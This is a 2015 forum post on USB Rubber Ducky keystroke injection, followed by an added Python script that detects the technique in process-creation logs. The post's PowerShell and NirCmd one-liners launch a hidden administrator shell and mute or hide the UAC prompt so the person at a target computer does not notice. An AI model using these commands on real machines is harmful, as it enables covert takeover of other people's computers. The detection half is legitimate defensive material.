SilentHacker Posted September 8, 2015

Hi! Before anything else, I should mention that I am new to all of this (my Rubber Ducky hasn't even arrived yet), but I've been digging around and I think I've come up with a pretty decent alternative to hiding windows in Windows (without having them scroll down and out of sight, which is very unstealthy). Like I've mentioned, my Rubber Ducky hasn't arrived yet, so I haven't gotten around to learning the script to its fullest. For that reason, I'm going to be sharing what the Ducky should do, step by step, instead of the actual inject.bin.

The Stealth enhancer:

After having the Ducky open the Run command (GUI + R), instead of having it write something like "cmd" or "powershell", give this a try and see for yourself:

powershell -windowstyle hidden start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

Now you have to make the Ducky press LEFT and ENTER to accept opening PowerShell as administrator. You can still catch a few glimpses of the two PowerShell windows that get opened, but they immediately disappear. Although it's not visible, one of the windows IS STILL OPEN so long as you don't click anywhere else. To prove that the PowerShell running as administrator is still open, type this out (without quotes; it's important that you type it): "start-process notepad.exe". This will open Notepad. This works fine on all my computers (Windows 8 and 10); I'm not sure about others, please let me know.

Removing the "Run as Admin" sound:

Some computers have this annoying warning sound when the box to confirm running something as admin pops up. This sound is especially annoying if you want to go undetected. There are two alternatives:

1) You could make the Ducky type "FN + ESC", which will mute or unmute the computer. The problem with this option is that, if the target computer is already muted, this will produce the opposite of the desired effect. So if you are using this one, make sure the target computer is not muted.

2) For this one we need the help of a tool called NirCmd. This tool is, I believe, a great asset for Rubber Ducky users. The potential for pranks is enormous. Here's what to do:

- First of all, you should get NirCmd: http://www.nirsoft.net/utils/nircmd.zip
- Unzip the file and copy "nircmd.exe" or "nircmd" to the Rubber Ducky's SD card.
- Next, make the Rubber Ducky run this after (GUI + R):

powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit

What this does is open a hidden PowerShell, mute the system, let the dialog box pop up, open a hidden administrator PowerShell (closing the previous one) and restore sound to the system. Alternatively, you could run this (if you don't want to restore sound to the system and would rather keep it muted):

powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

WARNING: Make sure to change "F:/nircmd/nircmd.exe" to whatever path your nircmd.exe file has on your Ducky.

Other applications for NirCmd:

- Open and hide apps. (Open Notepad and hide it, but it remains active and you can write whatever you want as long as you don't click anywhere else.)

start-process notepad.exe; F:/nircmd/nircmd.exe win hide class notepad

I don't know the full extent of this "hide" feature. I tried it with Google Chrome, but I didn't know the "class" so it didn't work. Play around with it and let me know.

- Show hidden apps.

F:/nircmd/nircmd.exe win show class notepad

- Make the computer read a text file (cool prank):

F:/nircmd/nircmd.exe speak file "c:\temp\speak.txt"

This is all I have had time to play with in the past few days. Please point out any mistakes I might have made and let me know your ideas. Play around with NirCmd's other features and share them here. Sorry for the messy post.
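From the defender's side, the chain described in this post (a hidden-window PowerShell launched from the Run dialog, a Start-Process -Verb runAs elevation, and NirCmd muting the volume or hiding windows around the UAC prompt) leaves a very recognisable trail in process-creation telemetry. The script below is an added detection example, not code from the post or from the NirCmd or Hak5 projects: it scores Sysmon Event ID 1-style records (Image, CommandLine, ParentImage) against those indicators. The weights, the alert threshold, the "non-system drive" heuristic for the Ducky's SD card, and every record in sample_events() are assumptions constructed for this illustration; it is written in Python so it runs offline against the embedded sample rather than requiring a Windows host.

```python
"""Score Sysmon-style process-creation records for the hidden-window PowerShell
and NirCmd volume/window tricks described in the post above.

Added detection example, not part of the original post.  Field names follow
Sysmon Event ID 1 (Image, CommandLine, ParentImage); the weights and the
threshold are assumptions chosen for this illustration, and every record in
sample_events() is constructed, not captured."""
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ProcEvent:
    pid: int
    image: str          # Sysmon "Image": full path of the new process
    command_line: str   # Sysmon "CommandLine"
    parent_image: str   # Sysmon "ParentImage"


@dataclass
class Finding:
    pid: int
    score: int
    reasons: List[str] = field(default_factory=list)


# PowerShell accepts any unambiguous prefix of -WindowStyle (-w, -win, ...),
# so match the prefix rather than the full parameter name.
HIDDEN_WINDOW = re.compile(r"""(?:^|[\s'"])-w[a-z]*\s+hidden\b""", re.I)
# Start-Process -Verb runAs is the UAC elevation step in the post's one-liner.
RUNAS_VERB = re.compile(r"-verb\s+runas\b", re.I)
# NirCmd sub-commands the post uses to silence the UAC chime and hide windows.
NIRCMD_TAMPER = re.compile(r"nircmd(?:\.exe)?\s+(?:mutesysvolume|win\s+hide)\b", re.I)
# Any drive letter other than C: is a rough stand-in for removable media
# (e.g. the Ducky's SD card mounted as F:); assumption, tune per environment.
NON_SYSTEM_DRIVE = re.compile(r"\b[D-Z]:[\\/]", re.I)

THRESHOLD = 3  # assumed alerting threshold for this illustration


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_powershell(image: str) -> bool:
    return basename(image) in ("powershell.exe", "pwsh.exe")


def analyze(ev: ProcEvent) -> Optional[Finding]:
    """Return a Finding when the record scores at or above THRESHOLD, else None."""
    f = Finding(pid=ev.pid, score=0)
    cmd = ev.command_line

    if is_powershell(ev.image) and HIDDEN_WINDOW.search(cmd):
        f.score += 3
        f.reasons.append("PowerShell started with a hidden window")
        if basename(ev.parent_image) == "explorer.exe":
            # Run-dialog / HID-keystroke launches show up as explorer.exe children.
            f.score += 2
            f.reasons.append("hidden PowerShell spawned directly by explorer.exe")
    if RUNAS_VERB.search(cmd):
        f.score += 3
        f.reasons.append("UAC elevation requested via Start-Process -Verb runAs")
    if NIRCMD_TAMPER.search(cmd):
        f.score += 4
        f.reasons.append("NirCmd used to mute audio or hide a window")
    if NON_SYSTEM_DRIVE.search(cmd) or NON_SYSTEM_DRIVE.search(ev.image):
        f.score += 1
        f.reasons.append("binary or argument on a non-system drive")

    return f if f.score >= THRESHOLD else None


def scan(events: List[ProcEvent]) -> List[Finding]:
    return [f for f in (analyze(ev) for ev in events) if f is not None]


def sample_events() -> List[ProcEvent]:
    """Constructed records mirroring the post's chain, plus two benign ones."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        ProcEvent(101, ps,
                  "powershell -windowstyle hidden start-process powershell.exe "
                  "-Verb runAs -argumentlist '-windowstyle hidden';exit",
                  r"C:\Windows\explorer.exe"),
        ProcEvent(102, ps,
                  "powershell.exe -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0",
                  ps),
        ProcEvent(103, r"F:\nircmd\nircmd.exe",
                  "F:/nircmd/nircmd.exe mutesysvolume 1", ps),
        ProcEvent(104, ps,
                  r"powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1",
                  r"C:\Windows\System32\svchost.exe"),
        ProcEvent(105, r"C:\Windows\System32\notepad.exe",
                  r"notepad.exe C:\notes.txt", r"C:\Windows\explorer.exe"),
    ]


if __name__ == "__main__":
    for finding in scan(sample_events()):
        print(f"pid {finding.pid}: score {finding.score}")
        for r in finding.reasons:
            print(f"  - {r}")
```

Run as a script it prints the three records from the post's chain with their reasons and stays silent on the two benign ones. The point of scoring rather than matching a single string is that the individual pieces (a hidden window, an elevation, a non-C: path) are each common enough in administration scripts, while their combination in one explorer.exe-spawned process is what makes the Run-dialog keystroke pattern stand out.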